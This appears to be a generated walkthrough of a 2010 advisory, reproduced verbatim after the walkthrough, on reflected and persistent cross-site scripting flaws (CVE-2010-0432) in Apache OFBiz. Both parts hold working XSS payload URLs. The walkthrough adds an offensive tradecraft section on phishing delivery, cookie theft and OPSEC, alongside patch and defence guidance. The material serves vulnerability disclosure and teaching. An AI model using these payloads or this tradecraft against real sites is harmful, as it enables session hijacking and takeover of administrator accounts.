Apache OFBiz Cross-Site Scripting Vulnerabilities (2010)

Apache OFBiz Cross-Site Scripting Vulnerabilities (2010)
What this paper is
This paper is an advisory from Bonsai Information Security detailing multiple Cross-Site Scripting (XSS) vulnerabilities found in Apache OFBiz, an open-source Enterprise Resource Planning (ERP) system. The advisory, published in April 2010, highlights how these vulnerabilities could be exploited to inject malicious scripts into the application, potentially leading to unauthorized actions by logged-in users, including administrators.
Simple technical breakdown
The core issue described is that Apache OFBiz, in certain versions and configurations, failed to properly "sanitize" or "encode" user-provided input before displaying it back on web pages. When a web application doesn't clean user input, an attacker can trick the application into embedding malicious code (like JavaScript) within the content it serves to other users. When another user's browser loads this content, it executes the malicious script, which can then perform actions on behalf of that user, often with their existing privileges.
The paper identifies several specific instances where this lack of sanitization occurs, affecting different parts of the OFBiz application. These vulnerabilities are categorized as "Reflected XSS" (where the malicious script is immediately reflected back to the user in the response) and "Persistent XSS" (where the malicious script is stored by the application and executed later when other users view the affected content).
Complete code and payload walkthrough
The provided paper does not contain executable code or shellcode in the traditional sense. Instead, it provides example URLs that demonstrate how to trigger the vulnerabilities. The "payload" is the malicious JavaScript embedded within these URLs.
Let's break down the examples provided in the paper:
8.1 A Reflected Cross Site Scripting vulnerability in the "productStoreId" variable
Vulnerable Component: The
productStoreIdvariable used in menu widget item links of typehidden-form.Problem: The value of
productStoreId, often derived from request parameters, was not HTML encoded when rendered as a hidden input value.Example URL:
https://www.ofbiz-example.com/ebaystore/control/exportProductListing?productStoreId=90100" style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px" onMouseOver="alert(document.cookie)Explanation of Payload/Injection:
productStoreId=90100": This part sets theproductStoreIdparameter. The crucial part is the closing double quote (") immediately after90100. This quote prematurely terminates thevalueattribute of the hidden input field.style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px": This is CSS styling injected to make the injected element cover the entire screen. It's designed to ensure theonMouseOverevent is easily triggered.onMouseOver="alert(document.cookie)": This is the actual JavaScript payload. When the user's mouse hovers over the element (which is now styled to cover the screen), thealert(document.cookie)JavaScript function is executed. This function displays a pop-up box containing the user's current cookies for that domain.
Code Fragment/Block -> Practical Purpose Mapping:
productStoreId=90100"-> Triggers the vulnerability by closing thevalueattribute prematurely.style="..."-> Ensures the injected HTML element is visible and interactive.onMouseOver="alert(document.cookie)"-> The injected JavaScript code that demonstrates the XSS by displaying cookies.
8.2 A Reflected Cross Site Scripting vulnerability in the "partyId" variable
Vulnerable Component: The
partyIdvariable in the 'View Profile' section.Problem: The application did not properly sanitize user input for the
partyIdparameter.Example URLs:
https://www.ofbiz-example.com/partymgr/control/viewprofile?&partyId=aa" style="width:100%25;height:100%25;display:block;absolute;top:0px;left:0px" onMouseOver="alert(document.cookie) https://www.neogia-example.com/partymgr/control/login;partyId=aa" style="width:100%25;height:100%25;display:block;absolute;top:0px;left:0px" onMouseOver="alert(document.cookie) https://www.opentaps-example.com/partymgr/control/viewprofile?partyId=aa" style="width:100%25;height:100%25;display:block;absolute;top:0px;left:0px" onMouseOver="alert(document.cookie)Explanation of Payload/Injection:
partyId=aa": Similar to the previous example, thepartyIdparameter is set, and a double quote (") is used to break out of the expected HTML attribute context.style="...": Again, CSS for screen coverage.onMouseOver="alert(document.cookie)": The JavaScript payload to demonstrate XSS by showing cookies. The;in theloginexample URL is a common way to separate parameters in URLs, and the injection still works by breaking out of the attribute.
Code Fragment/Block -> Practical Purpose Mapping:
partyId=aa"-> Triggers the vulnerability by breaking out of thepartyIdattribute.style="..."-> Ensures the injected HTML element is visible and interactive.onMouseOver="alert(document.cookie)"-> The injected JavaScript code that demonstrates the XSS by displaying cookies.
8.3 A Reflected Cross Site Scripting vulnerability in the "start" variable
Vulnerable Component: The
startvariable when aFreeMarker TemplateExceptionis thrown during page rendering.Problem: The stack trace and exception messages, which could contain un-sanitized user input, were printed directly into the response.
Example URL:
https://www.ofbiz-example.com/myportal/control/showPortalPage?period=week &start=1266796800000\<script>alert(document.cookie)</script>Explanation of Payload/Injection:
start=1266796800000: This is a legitimate parameter value (likely a timestamp).\<script>alert(document.cookie)</script>: This is the injected JavaScript payload. The backslash (\) before<script>is likely an attempt to escape characters that might be interpreted by the server-side processing *before* the FreeMarker rendering occurs. However, if the FreeMarker template itself is vulnerable to printing unescaped output from an exception, this script will be rendered. When the browser encounters this, it will executealert(document.cookie).
Code Fragment/Block -> Practical Purpose Mapping:
start=1266796800000-> A legitimate parameter value that is part of the vulnerable context.\<script>alert(document.cookie)</script>-> The injected JavaScript code that demonstrates the XSS by displaying cookies, leveraging the unescaped exception output.
8.4 A 404-based Reflected Cross Site Scripting vulnerability
Vulnerable Component: The 404 error page generated by the
ControlServletwhen an invalid request URI is supplied.Problem: The requested URI was displayed on the 404 error page without sanitization.
Example URLs:
https://www.ofbiz-example.com/facility/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!-- https://www.neogia-example.com/facility/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!-- http://www.opentaps-example.com/crmsfa/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!-- https://www.ententeoya-example.com/cms/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--Explanation of Payload/Injection:
/facility/control/ReceiveReturn": This is the "invalid request URI" part. The double quote (") is used to break out of whatever context the URI might be placed in on the 404 page.<b><body onLoad="alert(document.cookie)"><br><div>><!--: This is the injected HTML and JavaScript.<b>: Starts a bold tag.<body onLoad="alert(document.cookie)">: This is the core of the payload. It injects a<body>tag with anonLoadevent handler. When the browser renders this (even within an error page context), it will executealert(document.cookie)as soon as the body loads.<br><div>>: Additional HTML tags, likely for structure or to ensure proper rendering.<!--: This is an HTML comment, used to comment out any remaining characters on the line that might otherwise cause syntax errors.
Code Fragment/Block -> Practical Purpose Mapping:
/facility/control/ReceiveReturn"-> The malformed URI that triggers the 404 error. The trailing"breaks out of context.<b><body onLoad="alert(document.cookie)"><br><div>><!---> The injected HTML/JavaScript.onLoadexecutes thealertwhen the body is rendered. The comment<!--cleans up the rest of the line.
8.5 A Reflected Cross Site Scripting vulnerability in the "entityName" variable (ecommerce section)
Vulnerable Component: The
entityNamevariable in the 'ecommerce' section, specifically inViewBlogArticle.Problem: The application did not properly sanitize the
entityNameparameter before rendering.Example URLs:
http://www.ofbiz-example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\<script> alert(document.cookie)</script>&blogContentId=BLOGROOTBIGAL http://www.opentaps-example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\<script> alert(document.cookie)</script>&blogContentId=BLOGROOTBIGALExplanation of Payload/Injection:
contentId=BLG10000: A legitimate parameter.\<script>alert(document.cookie)</script>: The injected JavaScript payload. Similar to 8.3, the backslash (\) might be an attempt to escape characters. If theentityNameparameter is directly reflected without proper encoding, this script will execute.
Code Fragment/Block -> Practical Purpose Mapping:
contentId=BLG10000-> A legitimate parameter that is part of the vulnerable context.\<script>alert(document.cookie)</script>-> The injected JavaScript code that demonstrates the XSS by displaying cookies.
8.6 A Reflected Cross Site Scripting vulnerability in the "entityName" variable (Web Tools section)
Vulnerable Component: The
entityNamevariable within the 'Web Tools' section, specifically inFindGeneric.Problem: The application failed to correctly sanitize data from multiple form widget controls before rendering it.
Example URL:
https://www.ofbiz-example.com/webtools/control/FindGeneric?entityName=AccommodationClass\<script> alert(document.cookie)</script>&find=true&VIEW_SIZE=50&VIEW_INDEX=0Explanation of Payload/Injection:
entityName=AccommodationClass: A legitimate parameter value.\<script>alert(document.cookie)</script>: The injected JavaScript payload. Again, the backslash (\) is present. IfentityNameis reflected without proper encoding, this script will execute.
Code Fragment/Block -> Practical Purpose Mapping:
entityName=AccommodationClass-> A legitimate parameter value that is part of the vulnerable context.\<script>alert(document.cookie)</script>-> The injected JavaScript code that demonstrates the XSS by displaying cookies.
8.7 A Persistent Cross Site Scripting vulnerability
Vulnerable Component: Almost every user-controlled parameter within the application, with a specific example in
ecommerce/control/contactusforsubjectorcontentparameters.Problem: The application did not properly sanitize user input when storing it, leading to persistent injection.
Exploitation Steps:
- Injection: A logged-in user sends a string like
<script>alert(document.cookie)</script>in thesubjectorcontentparameters of theecommerce/control/contactussection. - Storage: The application stores this input directly in its database without proper sanitization.
- Execution: A logged-in Administrator later browses the 'Other Party Comms' section. When their browser renders the stored malicious script, it executes.
- Injection: A logged-in user sends a string like
Explanation of Payload/Injection:
<script>alert(document.cookie)</script>: This is the injected JavaScript. When stored and later rendered by the browser of another user (especially an administrator), it will execute, demonstrating the persistent nature of the vulnerability. This payload is designed to steal cookies.
Code Fragment/Block -> Practical Purpose Mapping:
subjectorcontentparameters inecommerce/control/contactus-> The input fields where the malicious script is injected.<script>alert(document.cookie)</script>-> The injected JavaScript payload that is stored and executed later.
Practical details for offensive operations teams
- Required Access Level: For reflected XSS vulnerabilities (8.1-8.6), an attacker typically needs to trick a victim user (who might have a higher privilege level, like an administrator) into clicking a crafted URL. For persistent XSS (8.7), an attacker needs to be a logged-in user with permission to submit content (e.g., sending a contact message).
- Lab Preconditions:
- A running instance of a vulnerable Apache OFBiz version (<= 9.04) or products based on it (e.g., Opentaps <= 1.4).
- Network access to the OFBiz instance.
- For reflected XSS, a way to deliver the crafted URL to the target user (e.g., email, chat, social engineering).
- For persistent XSS, an authenticated session as a user who can submit data.
- Tooling Assumptions:
- Web browser for crafting and testing URLs.
- Proxy tools (e.g., Burp Suite, OWASP ZAP) for intercepting and modifying requests, and for identifying vulnerable parameters.
- A text editor for crafting payloads.
- Potentially, a simple web server to host phishing pages if social engineering is involved.
- Execution Pitfalls:
- Encoding/Decoding: OFBiz might have some server-side encoding mechanisms that could interfere with simple payloads. Thorough testing and understanding of how the application processes parameters is crucial.
- Context of Injection: The effectiveness of the payload depends heavily on where it's injected and how the application renders it. For example, injecting into an HTML attribute requires breaking out of quotes, while injecting into text content might require different techniques.
- Browser Security: Modern browsers have built-in XSS filters that might block simple payloads. Payloads might need to be obfuscated or use less common JavaScript execution vectors.
- User Interaction: Reflected XSS requires user interaction (clicking a link). Social engineering is often a prerequisite.
- Privilege Escalation (for 8.7): The persistent XSS example shows how an attacker can escalate privileges by targeting an administrator. The attacker needs to submit the malicious script, and then wait for an administrator to view the content.
- Specific OFBiz Versions/Configurations: The vulnerabilities are tied to specific versions. Ensuring the target environment matches the vulnerable profile is key.
- Tradecraft Considerations:
- Reconnaissance: Identify the OFBiz version and deployed modules. Understand the application's workflow to find potential injection points.
- Payload Crafting: Start with simple payloads like
alert(document.cookie)to confirm the vulnerability. Then, develop more sophisticated payloads for cookie theft, session hijacking, or further exploitation. - Delivery: For reflected XSS, craft convincing phishing emails or messages. For persistent XSS, focus on gaining authenticated access.
- Post-Exploitation: If successful, the attacker can leverage stolen cookies to impersonate users, or use the injected JavaScript to perform actions on behalf of the victim.
- Anonymity: Standard operational security (OPSEC) practices apply, including using VPNs, proxies, and avoiding direct attribution.
Where this was used and when
- Context: These vulnerabilities were found in Apache OFBiz, an ERP system used by businesses. Products built on OFBiz, such as Opentaps, Neogia, and Entente Oya, were also affected.
- Timeframe: The advisory was published on April 13, 2010. The vulnerabilities were identified in February 2010. This means the exploits were relevant around 2010.
- Usage: While the paper details the potential for exploitation, it doesn't provide concrete examples of widespread real-world attacks. However, it's highly probable that these types of vulnerabilities were exploited by attackers targeting organizations using vulnerable versions of OFBiz for data theft, unauthorized access, or disruption.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the cornerstone of preventing XSS. All user-supplied input must be treated as untrusted.
- Server-Side Validation: Validate input against expected formats and lengths. Reject invalid data early.
- Output Encoding: Before rendering user-supplied data in HTML, ensure it's properly encoded for the context (e.g., HTML entity encoding for text, JavaScript encoding for script contexts, URL encoding for URLs).
- Content Security Policy (CSP): Implement CSP headers to define which resources (scripts, styles, etc.) are allowed to load and execute. This can significantly mitigate the impact of XSS, even if an injection occurs.
- Web Application Firewalls (WAFs): WAFs can detect and block common XSS attack patterns, providing an additional layer of defense. However, they are not foolproof and can be bypassed.
- Regular Patching and Updates: Keep all software, including web applications and their dependencies, up-to-date with the latest security patches. The advisory explicitly states that updating to later revisions fixed these issues.
- Secure Development Practices: Train developers on secure coding principles, including XSS prevention. Conduct regular code reviews and security testing (SAST, DAST).
- Least Privilege: Ensure that user accounts have only the necessary permissions. This limits the damage an attacker can do if they exploit a vulnerability.
- HTTPOnly and Secure Flags for Cookies: Set the
HTTPOnlyflag on cookies to prevent JavaScript from accessing them, and theSecureflag to ensure they are only sent over HTTPS. This limits the effectiveness of cookie-stealing XSS payloads.
ASCII visual (if applicable)
This advisory describes web application vulnerabilities, not network protocols or complex system architectures. A simple flow diagram illustrating the XSS attack vector is more appropriate than a traditional network diagram.
+-----------------+ +-----------------+ +-----------------+
| Attacker |----->| Vulnerable OFBiz|----->| Victim User |
| (Crafts URL/ | | Application | | (Clicks Link/ |
| Submits Data) | | (No Input | | Views Content) |
+-----------------+ | Sanitization) | +-----------------+
+--------+--------+
|
| Malicious Script
| Injected into Response
| or Stored Data
v
+-----------------+
| Victim's Browser|
| (Executes Script|
| e.g., Steals |
| Cookies) |
+-----------------+Explanation:
- The Attacker crafts a malicious URL or submits data containing a script.
- This input is sent to the Vulnerable OFBiz Application.
- The application, lacking proper input sanitization, includes the malicious script in its response to the Victim User (for reflected XSS) or stores it for later retrieval (for persistent XSS).
- The Victim User interacts with the application (e.g., clicks the link, views a page).
- The Victim's Browser renders the content and executes the injected script, leading to actions like cookie theft or unauthorized commands.
Source references
- Paper ID: 12330
- Paper Title: Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities
- Author: Lucas Apa
- Published: 2010-04-21
- Paper URL: https://www.exploit-db.com/papers/12330
- Raw URL: https://www.exploit-db.com/raw/12330
- Original Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php
- CVE Name: CVE-2010-0432
Original Exploit-DB Content (Verbatim)
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/
Multiple XSS in Apache OFBiz
1. *Advisory Information*
Title: Multiple XSS in Apache OFBiz
Advisory ID: BONSAI-2010-0103
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php
Date published: 2010-04-13
Vendors contacted: Apache Software Foundation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-0432
3. *Software Description*
Apache Open For Business (Apache OFBiz) is a community-driven
Open Source Enterprise Resource Planning (ERP) system.
It provides a suite of enterprise applications that integrate
and automate many of the business processes of an enterprise.
Apache OFBiz is a foundation and starting point for reliable,
secure and scalable enterprise solutions.
OFBiz is an Apache Software Foundation top level project.
4. *Vulnerability Description*
Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.
This vulnerability can be exploited to force a logged in Administrator
to run arbitrary SQL commands [3] or create a new user with Full Privileges [4].
You can find customized XSS PoC payloads here.
For additional information and a demonstrative video, please read [1] and [2].
5. *Vulnerable packages*
Apache OFBiz:
- Stable Version <= 9.04
- SVN Revision <= 920371
- Release Branch Candidate 4.0 Revision <= 920381
Products based on Apache OFBiz:
- Opentaps Version <= 1.4
- Neogia Version <= 1.0
- Entente Oya Version <= 1.6
Since there are more products based on Apache OFBiz, these vulnerabilities resides
in some of them but unconfirmed. Check [2] for updates.
6. *Mitigation*
SVN Trunk users should update to at least revision 920372
from svn or apply the following patches [5].
Release Branch Candidate 09.04 should update to at least revision 920382
from svn or applythe following patches [6].
Apache Software Foundation developers informed us that all users should
upgrade to the latest version of Apache OFBiz, which fixes this vulnerability.
More information to be found here:
http://ofbiz.apache.org
7. *Credits*
These vulnerabilities were discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).
8. *Technical Description*
8.1 A Reflected Cross Site Scripting vulnerability was found in the
"productStoreId" variable within the 'Export Product Listing' section.
When rendering menu widget item links of type hidden-form, the hidden
input value attributes were not being html encoded. In many cases these
hidden input values are derived from request parameters and could be used
in a Reflected Cross-Site Scripting attack.
For a page that contains a menu widget with the following menu item definition:
<menu-item name="ebayExportAllCategoryToEbayStore" title="${uiLabelMap.EbayExportAllCategoryToEbayStore}">
<link target="exportCategoryEbayStore">
<parameter param-name="productStoreId" value="${parameters.productStoreId}"/>
</link>
</menu-item>
The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/ebaystore/control/exportProductListing?productStoreId=90100"
style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px"
onMouseOver="alert(document.cookie)
8.2 A Reflected Cross Site Scripting vulnerability was found in the
"partyId" variable within the 'View Profile' section.
This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/partymgr/control/viewprofile?&partyId=aa"
style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px"
onMouseOver="alert(document.cookie)
https://www.neogia-example.com/partymgr/control/login;partyId=aa"
style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px"
onMouseOver="alert(document.cookie)
https://www.opentaps-example.com/partymgr/control/viewprofile?partyId=aa"
style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px"
onMouseOver="alert(document.cookie)
8.3 A Reflected Cross Site Scripting vulnerability was found in the
"start" variable within the 'Show Portal Page' section.
During page rendering, if a FreeMarker TemplateException is thrown
then the stack trace is printed directly into the response and the
exception messages may contain un-sanitized user input which can expose
a Reflected Cross-Site Scripting vulnerability.
For any page rendered via a FreeMarker template that contains:
${screens.render(screenLocation, screenName)}
(or a similar screens.render(…) call)
The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/myportal/control/showPortalPage?period=week
&start=1266796800000\<script>alert(document.cookie)</script>
8.4 A 404-based Reflected Cross Site Scripting vulnerability was found
on the whole application.
When using the ControlServlet, if an invalid request URI is supplied then
the 404 error page displays the requested URI without first sanitizing it.
The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/facility/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
https://www.neogia-example.com/facility/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
http://www.opentaps-example.com/crmsfa/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
https://www.ententeoya-example.com/cms/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
8.5 A Reflected Cross Site Scripting vulnerability was found
on the ecommerce section specifically in the 'entityName' variable.
The vulnerability can be triggered by clicking on the
following URL:
http://www.ofbiz-example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\<script>
alert(document.cookie)</script>&blogContentId=BLOGROOTBIGAL
http://www.opentaps-example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\<script>
alert(document.cookie)</script>&blogContentId=BLOGROOTBIGAL
8.6 A Reflected Cross Site Scripting vulnerability was found in the
"entityName" variable within the 'Web Tools' section.
This is because the application fails to correctly sanitize
multiple form widget controls data before rendering it.
The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/webtools/control/FindGeneric?entityName=AccommodationClass\<script>
alert(document.cookie)</script>&find=true&VIEW_SIZE=50&VIEW_INDEX=0
8.7 A Persistant Cross Site Scripting vulnerability was found in almost
every user controlled parameters within the application.
This is because the application does not properly sanitise
the users input. An example of this vulnerability can be triggered by
following these steps.
i) A logged in user sends the following string on 'subject' or 'content'
parameters within the 'ecommerce/control/contactus' section.
<script>alert(document.cookie)</script>
ii) A logged in Administrator browses 'Other Party Comms' section.
iii) The browser executes the JavaScript on every future Other Party Comms load.
9. *Report Timeline*
- 2010-02-17:
Vulnerabilities were identified.
- 2010-02-23:
Vendor contacted.
- 2010-02-24:
Other products based on Ofbiz contacted. No specific answer given
- 2010-02-27:
Vendor confirms this issue and inform us a fix will be available soon.
- 2010-03-08:
Vendor fixed this issue.
- 2010-03-09:
Other products based on Ofbiz contacted again for an approximate fix release date. No answer.
- 2010-03-12:
Other products based on Ofbiz contacted. No answer.
- 2010-04-13:
The advisory BONSAI-2010-0103 is published.
10. *References*
[0] http://ofbiz.apache.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/en/research/vulnerabilities/ofbizexploiter.php
[3] http://www.bonsai-sec.com/en/research/vulnerabilities/create-user-xss-payload.js
[4] http://www.bonsai-sec.com/en/research/vulnerabilities/sql-exec-xss-payload.js
[5] http://svn.apache.org/viewvc?rev=920369&view=rev
http://svn.apache.org/viewvc?rev=920370&view=rev
http://svn.apache.org/viewvc?rev=920371&view=rev
http://svn.apache.org/viewvc?rev=920372&view=rev
[6] http://svn.apache.org/viewvc?rev=920379&view=rev
http://svn.apache.org/viewvc?rev=920380&view=rev
http://svn.apache.org/viewvc?rev=920381&view=rev
http://svn.apache.org/viewvc?rev=920382&view=rev
[7] http://www.bonsai-sec.com/blog
11. *About Bonsai*
Bonsai is a company involved in providing professional computer information security services.
Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our customers' real needs.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be
distributed freely provided that no fee is charged for this distribution and proper credit is
given.